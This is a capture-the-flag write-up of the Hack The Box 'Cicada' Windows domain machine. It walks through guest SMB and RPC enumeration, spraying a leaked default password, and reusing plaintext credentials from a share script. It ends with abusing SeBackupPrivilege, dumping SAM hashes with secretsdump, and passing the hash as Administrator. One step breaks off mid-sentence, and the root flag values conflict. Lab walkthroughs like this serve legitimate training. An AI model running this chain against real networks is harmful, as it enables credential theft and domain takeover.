Hack The Box Write-Up Cicada
About Cicada
In this post, I’m writing a write-up for the machine Cicada from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Cicada is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.
Foothold
User
Root
Machine Info
Machine Name: | Cicada |
Difficulty: | Easy |
Points: | 20 |
Release Date: | 07 Nov 2020 |
IP: | 10.129.231.149 |
Creator: | theblxckcicada |
Recon
Portscan with Nmap
As always, we start this machine with a portscan with Nmap
.
1
nmap -sC -sV -oA ./nmap/10.129.231.149 10.129.231.149
The results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 05:23 CST
Nmap scan report for 10.129.231.149
Host is up (0.075s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 18:24:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-19T18:24:48
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds
Enemuration
rpcclient
Connect to rpcclient as guest user. ANONYMOUS LOGON
was also workuing, but with limit access.
1
$ rpcclient --user GUEST --password="" cicada.htb
Try to find as which user we are connected with. We have now some sids, we can now try to bruteforce the sids.
1
2
3
4
5
6
7
8
rpcclient $> lookupnames GUEST
GUEST S-1-5-21-917908876-1423158569-3159038727-501 (User: 1)
rpcclient $>
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-500
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (1)
rpcclient $>
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-502
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (1)
Found two users Guest
and Administrator
smbmap
Checked the SMB
1
2
3
4
5
6
7
8
9
10
11
$ smbmap -H cicada.htb -u "guest" -p ""
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
found some interessting shares. Connect to the HR
share.
1
2
3
4
5
6
7
8
9
10
11
12
13
Found the file `Notice from HR.txt`.
```console
root@htb-1d522eiiwk:/home/t13nn3s/my_data# smbclient //cicada.htb/HR --user guest --password ""
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 439288 blocks available
smb: \>
Downloaded the file
1
2
3
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (38.6 KiloBytes/sec) (average 38.6 KiloBytes/sec)
Checked the contents of the file.
1
$ cat Notice\ from\ HR.txt
The contents:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Nice! We found the default password Cicada$M6Corpb*@Lp#nZp!8
User enumeration
We now only have to find some usernames and check if the default password fits for some users. Wrote a small bash script to enumerate the users based on their sid
1
2
3
for i in $(seq 500 4000); do
rpcclient --user "GUEST" --password="" cicada.htb -c "lookupsids S-1-5-21-917908876-1423158569-3159038727-$i" | grep -v "CICADA";
done
After running the script, we found the following usernames
1
2
3
4
5
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
After some testing with smbmap
we found that the default password works for the user michael.wrightson
.
1
2
3
4
5
6
7
8
9
10
11
12
smbmap -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -H cicada.htb
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
root@htb-vbpxy0fxms:/home/t13nn3s/my_data#
First tried to establish an WinRM connection with this machine with the user michael.wrightson
, but he has no permission. Since we have credentials to authenticate against the Active Directory we can run Bloodhound
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bloodhound-python --domain cicada.htb -c all -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -dc cicada-dc.cicada.htb -ns 10.129.231.149 --dns-tcp
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 02S
The user account emily.oscars
is member of the group REMOTE MANAGEMENT [email protected]
.
Aftre further analysis of the members of the group [email protected]
we can
We have found the password aRt$Lp#7t*VQ!3
that belongs to the user david.orelious
.
We can restart the enumeration process of the SMB.
1
smbmap -H cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'
The output.
1
2
3
4
5
6
7
8
9
10
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV READ ONLY
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Connect to the DEV
share.
1
smbclient //cicada.htb/DEV --user david.orelious --password 'aRt$Lp#7t*VQ!3'
Interesting file Backup_script.ps1
. Download the script.
1
2
3
4
5
6
7
8
9
10
11
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 424721 blocks available
smb: \> mget Backup_script.ps1
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,9 KiloBytes/sec) (average 3,9 KiloBytes/sec)
smb: \>
Contents of the script.
1
2
3
4
5
6
7
8
9
10
11
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
evil winrm session as emily.oscars
.
1
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
read the user flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ls
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/30/2024 9:29 AM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
ce92f2c2963fea6d4308b59a36eb2dae
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
Privilege Escalation
Enumeration
The user account emily.oscars
has the SeBackupPrivilege
.
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
upload the files
1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
import the modules.
1
2
3
4
5
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege 'C:\users\administrator\desktop\root.txt' .\root.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type root.txt
9668a9dbfd79509169398cbe43f4151a
Privilege Escalation
Download system and sam
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Progress: 28% : |▓▒░░░░░░░░|
Use secretsdump
1
2
3
4
5
6
7
8
9
10
impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
─[eu-dedivip-1]─[10.10.14.38]─[t13nn3s@htb-j5kiqrdxs4]─[~/my_data]
└──╼ [★]$ evil-winrm -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341' -i cicada.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
3cbbc6b21aaa327e9f98355c30e09de5
*Evil-WinRM* PS C:\Users\Administrator\Documents>
We have owned CICADA!
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!
Happy Hacking :-)